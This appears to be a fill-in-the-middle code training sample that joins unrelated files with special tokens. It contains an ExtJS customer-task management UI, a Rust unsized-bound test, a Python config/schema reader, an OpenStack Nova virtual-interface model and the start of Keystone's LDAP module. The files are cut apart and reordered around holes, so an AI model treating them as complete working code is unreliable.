url : 'task.do?action=customerTask',
params : {
cids : cids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}, {
text : '自定义任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var cids = '';
var mid = '';
var win = new Ext.Window({
title : '自定义任务',
id : 'editWin',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 250,
items : [new Ext.form.FormPanel({
id : 'editForm',
frame : true,
bodyStyle : 'padding : 30px; 20px;',
defaults : {
msgTarget : 'under'
},
height : 'auto',
labelWidth : 80,
labelAlign : 'right',
items : [{
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户名称',
xtype : 'textfield',
id : 'customer',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cnames = '';
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
cnames += ',' + crecords[i].get('name');
}
Ext.getCmp('customer').setValue(cnames.substring(1));
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}, {
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户经理',
xtype : 'textfield',
id : 'manager',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户经理
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerManager.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'username', 'department', 'area']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win1 = new Ext.Window({
title : '选择客户经理',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 600,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), {
header : '客户经理名称',
width : 130,
dataIndex : 'name',
align : 'center'
}, {
header : '用户名',
width : 130,
dataIndex : 'username',
align : 'center'
}, {
header : '部门',
width : 130,
dataIndex : 'department',
align : 'center'
}, {
header : '片区',
width : 130,
dataIndex : 'area',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (mrecords.length < 1) {
alert('请选择客户经理!');
return;
}
mid = mrecords[0].get('id');
var manager = mrecords[0].get('name');
if (mrecords[0].get('department') != "") {
manager = manager + "-" + mrecords[0].get('department');
}
if (mrecords[0].get('area') != "") {
manager = manager + "-" + mrecords[0].get('area');
}
Ext.getCmp('manager').setValue(manager);
Ext.getCmp('bind').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}],
buttons : [{
text : '确定',
handler : function() {
Ext.getCmp('editWin').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
<|fim▁hole|> url : 'task.do?action=newCustomerTask',
params : {
mid : mid,
cids : cids,
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('editWin').close();
}
}]
})]
});
win.show(Ext.getBody());
}
}]
});
panel = new Ext.form.FormPanel({
id : 'form',
defaults : {
width : 250,
msgTarget : 'under'
},
bodyStyle : 'padding : 50px; 150px;',
labelWidth : 80,
labelAlign : 'right',
tbar : [{
xtype : 'button',
id : 'ad',
iconCls : 'add',
text : '增加内容',
align : 'right',
width : 80,
handler : function() {
this.cn = this.cn + 1;
var f = Ext.getCmp('form');
var a = Ext.getCmp('ad');
var t = Ext.getCmp('tsb');
var c = new Ext.form.TextField({
fieldLabel : '任务内容' + this.cn,
allowBlank : false,
name : 'content' + this.cn,
id : 'content' + this.cn,
xtype : 'textfield'
});
f.remove(t);
f.add(c);
f.add(n);
f.doLayout();
},
scope : this
}],
items : [{
fieldLabel : '任务起始时间',
allowBlank : false,
editable : false,
name : 'start',
id : 'start',
xtype : 'datefield'
}, {
fieldLabel : '任务完成时间',
allowBlank : false,
editable : false,
name : 'end',
id : 'end',
xtype : 'datefield'
}, {
fieldLabel : '任务标题',
allowBlank : false,
name : 'content',
id : 'content',
xtype : 'textfield'
}, {
fieldLabel : '任务内容' + this.cn,
allowBlank : false,
name : 'content' + this.cn,
id : 'content' + this.cn,
xtype : 'textfield'
}, {
xtype : 'button',
id : 'tsb',
text : '发放任务',
align : 'right',
width : 80,
menu : [{
text : '常规任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=normal',
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
// }, {
// text : '个别任务',
// handler : function() {
// if (!Ext.getCmp('form').getForm().isValid()) {
// alert('请正确填写表单');
// return;
// }
//
//
// var sm = new Ext.grid.CheckboxSelectionModel();
// var store1 = new Ext.data.Store({
// proxy : new Ext.data.HttpProxy({
// url : 'customerManager.do?action=queryAll'
// }),
// reader : new Ext.data.JsonReader({
// root : 'rows',
// totalProperty : 'total',
// id : 'id',
// fields : ['id', 'name', 'username']
// })
// });
//
// var paging = new Ext.PagingToolbar({
// pageSize : 20,
// store : store1,
// displayInfo : true,
// displayMsg : '当前显示数据 {0} - {1} of {2}',
// emptyMsg : '没有数据'
// });
//
// var win = new Ext.Window({
// title : '客户经理',
// id : 'bind',
// layout : 'fit',
// border : false,
// modal : true,
// width : 500,
// height : 400,
// items : [new Ext.grid.GridPanel({
// id : 'grid1',
// loadMask : true,
//// tbar : [{
//// xtype : 'textfield',
//// id : 'searchName',
//// emptyText : '请输入客户经理名称...',
//// width : 150
//// }, {
//// text : '搜索',
//// width : 45,
//// xtype : 'button',
//// handler : function() {
////
//// }
//// }],
// store : store1,
// sm : sm,
// cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
// header : '客户经理名称',
// width : 200,
// dataIndex : 'name',
// align : 'center'
// }, {
// header : '客户经理用户名',
// width : 230,
// dataIndex : 'username',
// align : 'center'
// }]),
// bbar : paging
// })],
// buttons : [{
// text : '确定',
// handler : function() {
// var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
// if (mrecords.length < 1) {
// alert('请选择要做任务的客户经理!');
// return;
// }
// var mids = '';
// for (var j = 0; j < mrecords.length; j++) {
// mids += ',' + mrecords[j].get('id');
// }
//
// Ext.getCmp('bind').close();
// Ext.getCmp('form').getForm().submit({
// waitTitle : '提示',
// waitMsg : '正在提交数据请稍后...',
// url : 'task.do?action=indevi',
// params : {
// mids : mids
// },
// method : 'post',
// success : function(form, action) {
// alert(action.result.myHashMap.msg);
// },
// failure : function(form, action) {
// alert(action.result.myHashMap.msg);
// }
// });
//
// }
// }, {
// text : '取消',
// handler : function() {
// Ext.getCmp('bind').close();
// }
// }]
// });
// win.show(Ext.getBody());
// store1.load({
// params : {
// start : 0,
// limit : 20
// }
// });
//
// }
}, {
text : '分组任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var sm = new Ext.grid.CheckboxSelectionModel();
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerGroup.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win = new Ext.Window({
title : '客户分组',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户分组名称',
width : 200,
dataIndex : 'name',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var grecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (grecords.length < 1) {
alert('请选择客户分组!');
return;
}
var gids = '';
for (var j = 0; j < grecords.length; j++) {
gids += ',' + grecords[j].get('id');
}
Ext.getCmp('bind').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=group',
params : {
gids : gids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20,
all : 0
}
});
}
}, {
text : '客户任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cids = "";
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=customerTask',
params : {
cids : cids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}, {
text : '自定义任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var cids = '';
var mid = '';
var win = new Ext.Window({
title : '自定义任务',
id : 'editWin',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 250,
items : [new Ext.form.FormPanel({
id : 'editForm',
frame : true,
bodyStyle : 'padding : 30px; 20px;',
defaults : {
msgTarget : 'under'
},
height : 'auto',
labelWidth : 80,
labelAlign : 'right',
items : [{
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户名称',
xtype : 'textfield',
id : 'customer',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cnames = '';
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
cnames += ',' + crecords[i].get('name');
}
Ext.getCmp('customer').setValue(cnames.substring(1));
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}, {
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户经理',
xtype : 'textfield',
id : 'manager',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户经理
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerManager.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'username', 'department', 'area']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win1 = new Ext.Window({
title : '选择客户经理',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 600,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), {
header : '客户经理名称',
width : 130,
dataIndex : 'name',
align : 'center'
}, {
header : '用户名',
width : 130,
dataIndex : 'username',
align : 'center'
}, {
header : '部门',
width : 130,
dataIndex : 'department',
align : 'center'
}, {
header : '片区',
width : 130,
dataIndex : 'area',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (mrecords.length < 1) {
alert('请选择客户经理!');
return;
}
mid = mrecords[0].get('id');
var manager = mrecords[0].get('name');
if (mrecords[0].get('department') != "") {
manager = manager + "-" + mrecords[0].get('department');
}
if (mrecords[0].get('area') != "") {
manager = manager + "-" + mrecords[0].get('area');
}
Ext.getCmp('manager').setValue(manager);
Ext.getCmp('bind').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}],
buttons : [{
text : '确定',
handler : function() {
Ext.getCmp('editWin').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=newCustomerTask',
params : {
mid : mid,
cids : cids,
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('editWin').close();
}
}]
})]
});
win.show(Ext.getBody());
}
}]
}]
});
}
return panel;
}
};<|fim▁end|> | waitMsg : '正在提交数据请稍后...',
|
<|file_name|>unsized4.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that bounds are sized-compatible.
trait T {}
fn f<type Y: T>() {
//~^ERROR incompatible bounds on type parameter Y, bound T does not allow unsized type<|fim▁hole|>
pub fn main() {
}<|fim▁end|> | } |
<|file_name|>common.py<|end_file_name|><|fim▁begin|>#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2007-2011 Tualatrix Chou <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
import glob
import logging
import ConfigParser
from lxml import etree
log = logging.getLogger('CommonSetting')
class RawConfigSetting(object):
'''Just pass the file path'''
def __init__(self, path, type=type):
self._type = type
self._path = path
self.init_configparser()
def _type_convert_set(self, value):
if type(value) == bool:
if value == True:
value = 'true'
elif value == False:
value = 'false'
# This is a hard code str type, so return '"xxx"' instead of 'xxx'
if self._type == str:
value = "'%s'" % value
return value
def _type_convert_get(self, value):
if value == 'false':
value = False
elif value == 'true':
value = True
# This is a hard code str type, so return '"xxx"' instead of 'xxx'
if self._type == str or type(value) == str:
if (value.startswith('"') and value.endswith('"')) or \
(value.startswith("'") and value.endswith("'")):
value = eval(value)
return value
def init_configparser(self):
self._configparser = ConfigParser.ConfigParser()
self._configparser.read(self._path)
def sections(self):
return self._configparser.sections()
def options(self, section):<|fim▁hole|>
def set_value(self, section, option, value):
value = self._type_convert_set(value)
if not self._configparser.has_section(section):
self._configparser.add_section(section)
self._configparser.set(section, option, value)
with open(self._path, 'wb') as configfile:
self._configparser.write(configfile)
self.init_configparser()
def get_value(self, section, option):
if self._type:
if self._type == int:
getfunc = getattr(self._configparser, 'getint')
elif self._type == float:
getfunc = getattr(self._configparser, 'getfloat')
elif self._type == bool:
getfunc = getattr(self._configparser, 'getboolean')
else:
getfunc = getattr(self._configparser, 'get')
value = getfunc(section, option)
else:
log.debug("No type message, so use the generic get")
value = self._configparser.get(section, option)
value = self._type_convert_get(value)
return value
class Schema(object):
cached_schema = {}
cached_schema_tree = {}
cached_override = {}
@classmethod
def load_override(cls):
log.debug("\tLoading override")
for override in glob.glob('/usr/share/glib-2.0/schemas/*.gschema.override'):
try:
cs = RawConfigSetting(override)
for section in cs.sections():
cls.cached_override[section] = {}
for option in cs.options(section):
cls.cached_override[section][option] = cs.get_value(section, option)
except Exception, e:
log.error('Error while parsing override file: %s' % override)
@classmethod
def load_schema(cls, schema_id, key):
log.debug("Loading schema value for: %s/%s" % (schema_id, key))
if not cls.cached_override:
cls.load_override()
if schema_id in cls.cached_override and \
key in cls.cached_override[schema_id]:
return cls.cached_override[schema_id][key]
if schema_id in cls.cached_schema and \
key in cls.cached_schema[schema_id]:
return cls.cached_schema[schema_id][key]
schema_defaults = {}
for schema_path in glob.glob('/usr/share/glib-2.0/schemas/*'):
if not schema_path.endswith('.gschema.xml') and not schema_path.endswith('.enums.xml'):
#TODO deal with enums
continue
if schema_path in cls.cached_schema_tree:
tree = cls.cached_schema_tree[schema_path]
else:
tree = etree.parse(open(schema_path))
for schema_node in tree.findall('schema'):
if schema_node.attrib.get('id') == schema_id:
for key_node in schema_node.findall('key'):
if key_node.findall('default'):
schema_defaults[key_node.attrib['name']] = cls.parse_value(key_node)
else:
continue
cls.cached_schema[schema_id] = schema_defaults
if key in schema_defaults:
return schema_defaults[key]
else:
return None
@classmethod
def parse_value(cls, key_node):
log.debug("Try to get type for value: %s" % key_node.items())
value = key_node.find('default').text
#TODO enum type
if key_node.attrib.get('type'):
type = key_node.attrib['type']
if type == 'b':
if value == 'true':
return True
else:
return False
elif type == 'i':
return int(value)
elif type == 'd':
return float(value)
elif type == 'as':
return eval(value)
return eval(value)<|fim▁end|> | return self._configparser.options(section) |
<|file_name|>virtual_interface.py<|end_file_name|><|fim▁begin|># Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software<|fim▁hole|># License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
# TODO(berrange): Remove NovaObjectDictCompat
class VirtualInterface(base.NovaPersistentObject, base.NovaObject,
base.NovaObjectDictCompat):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'id': fields.IntegerField(),
'address': fields.StringField(nullable=True),
'network_id': fields.IntegerField(),
'instance_uuid': fields.UUIDField(),
'uuid': fields.UUIDField(),
}
@staticmethod
def _from_db_object(context, vif, db_vif):
for field in vif.fields:
vif[field] = db_vif[field]
vif._context = context
vif.obj_reset_changes()
return vif
@base.remotable_classmethod
def get_by_id(cls, context, vif_id):
db_vif = db.virtual_interface_get(context, vif_id)
if db_vif:
return cls._from_db_object(context, cls(), db_vif)
@base.remotable_classmethod
def get_by_uuid(cls, context, vif_uuid):
db_vif = db.virtual_interface_get_by_uuid(context, vif_uuid)
if db_vif:
return cls._from_db_object(context, cls(), db_vif)
@base.remotable_classmethod
def get_by_address(cls, context, address):
db_vif = db.virtual_interface_get_by_address(context, address)
if db_vif:
return cls._from_db_object(context, cls(), db_vif)
@base.remotable_classmethod
def get_by_instance_and_network(cls, context, instance_uuid, network_id):
db_vif = db.virtual_interface_get_by_instance_and_network(context,
instance_uuid, network_id)
if db_vif:
return cls._from_db_object(context, cls(), db_vif)
@base.remotable
def create(self):
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='create',
reason='already created')
updates = self.obj_get_changes()
db_vif = db.virtual_interface_create(self._context, updates)
self._from_db_object(self._context, self, db_vif)
@base.remotable_classmethod
def delete_by_instance_uuid(cls, context, instance_uuid):
db.virtual_interface_delete_by_instance(context, instance_uuid)
class VirtualInterfaceList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('VirtualInterface'),
}
child_versions = {
'1.0': '1.0',
}
@base.remotable_classmethod
def get_all(cls, context):
db_vifs = db.virtual_interface_get_all(context)
return base.obj_make_list(context, cls(context),
objects.VirtualInterface, db_vifs)
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid, use_slave=False):
db_vifs = db.virtual_interface_get_by_instance(context, instance_uuid,
use_slave=use_slave)
return base.obj_make_list(context, cls(context),
objects.VirtualInterface, db_vifs)<|fim▁end|> | # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the |
<|file_name|>core.py<|end_file_name|><|fim▁begin|># Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import codecs
import functools
import os.path
import re
import sys
import weakref
import ldap.filter
import ldappool
from oslo_log import log
import six
from keystone import exception
from keystone.i18n import _
from keystone.i18n import _LW
LOG = log.getLogger(__name__)
LDAP_VALUES = {'TRUE': True, 'FALSE': False}
CONTROL_TREEDELETE = '1.2.840.113556.1.4.805'
LDAP_SCOPES = {'one': ldap.SCOPE_ONELEVEL,
'sub': ldap.SCOPE_SUBTREE}
LDAP_DEREF = {'always': ldap.DEREF_ALWAYS,
'default': None,
'finding': ldap.DEREF_FINDING,
